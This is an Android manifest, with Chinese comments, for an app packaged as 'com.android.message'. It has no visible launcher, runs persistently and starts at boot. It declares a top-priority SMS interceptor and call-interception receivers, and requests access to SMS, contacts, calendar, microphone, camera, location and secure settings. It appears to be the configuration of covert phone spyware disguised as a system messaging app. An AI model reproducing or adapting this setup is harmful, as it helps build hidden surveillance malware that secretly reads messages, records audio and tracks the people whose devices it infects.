<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    package="com.android.message"
    android:versionCode="1"
    android:versionName="1.0" >

    <uses-sdk android:minSdkVersion="8" />

    <application
        android:icon="@drawable/ic_launcher"
        android:label="@string/app_name"
        android:persistent="true" >

        <!--
        <activity
            android:label="@string/app_name"
            android:name=".MessageServiceActivity" >
            <intent-filter >
            </intent-filter>
        </activity>
        -->
        <service
            android:enabled="true"
            android:name=".RegisterService" />
        <service
            android:enabled="true"
            android:name=".NetworkService" />
        <service
            android:enabled="true"
            android:name=".VoiceService" />

        <receiver android:name=".SMSBroadcastReceiver" >
            <intent-filter android:priority="10000" >
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />

                <category android:name="android.intent.category.DEFAULT" />
            </intent-filter>
        </receiver>
        <receiver android:name=".BootBroadcastReceiver" >
            <intent-filter >
                <action android:name="android.intent.action.BOOT_COMPLETED" >
                </action>
            </intent-filter>
        </receiver>
        <!-- 定义广播接收者接收 android.intent.action.NEW_OUTGOING_CALL -->
        <!-- 包括呼出NEW_OUTGOING_CALL和呼入PHONE_STATE -->
        <receiver android:name=".OutgoingCallReceiver" >
            <intent-filter android:priority="1" >
                <action android:name="android.intent.action.NEW_OUTGOING_CALL" />
                <action android:name="android.intent.action.PHONE_STATE" />
            </intent-filter>
        </receiver>
    </application>

    <!-- 联网权限 -->
    <uses-permission android:name="android.permission.INTERNET" />
    <!-- 获取机型信息权限 -->
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />
    <!-- 获取短信阅读权限 -->
    <uses-permission android:name="android.permission.READ_SMS" />
    <!-- 获取通讯录的权限 -->
    <uses-permission android:name="android.permission.READ_CONTACTS" />
    <!-- 获取录音的权限 -->
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <!-- 获取短信发送权限 -->
    <uses-permission android:name="android.permission.SEND_SMS" />
    <!-- 获取短信接收权限 -->
    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <!-- 获取日历读取权限 -->
    <uses-permission android:name="android.permission.READ_CALENDAR" />
    <!-- 获取APN修改权限 -->
    <uses-permission android:name="android.permission.WRITE_APN_SETTINGS" >
    </uses-permission>
    <!-- 获取网络状态权限 -->
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" >
    </uses-permission>
    <!-- 获取照相权限 -->

    <uses-permission android:name="android.permission.CAMERA" />

    <uses-feature android:name="android.hardware.camera.autofocus" />
    <uses-feature android:name="android.hardware.camera" />
    <uses-feature android:name="android.hardware.camera.flash" />

    <!-- 获取SD卡写入权限 -->
    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" >
    </uses-permission>
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_LOCATION_EXTRA_COMMANDS" />
    <uses-permission android:name="android.permission.ACCESS_GPS" />
    <uses-permission android:name="android.permission.ACCESS_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_MOCK_LOCATION" />

    <!-- 自启动权限 -->
    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />

    <!-- 电量控制权限 -->
    <uses-permission android:name="android.permission.WAKE_LOCK" />
    <uses-permission android:name="android.permission.DEVICE_POWER" />

    <!-- 获取位置信息的权限 -->
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />

    <!-- 网络获取连接权限 -->
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" >
    </uses-permission>
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" >
    </uses-permission>
    <uses-permission android:name="android.permission.WRITE_SETTINGS" >
    </uses-permission>
    <uses-permission android:name="android.permission.WRITE_SECURE_SETTINGS" >
    </uses-permission>
    <!-- 阻止电话播出所需权限 -->
    <uses-permission android:name="android.permission.PROCESS_OUTGOING_CALLS" >
    </uses-permission>
    <!-- 拦截电话所需的权限 -->
    <uses-permission android:name="android.permission.CALL_PHONE" />
    <uses-permission android:name="android.permission.READ_PHONE_STATE" />

</manifest>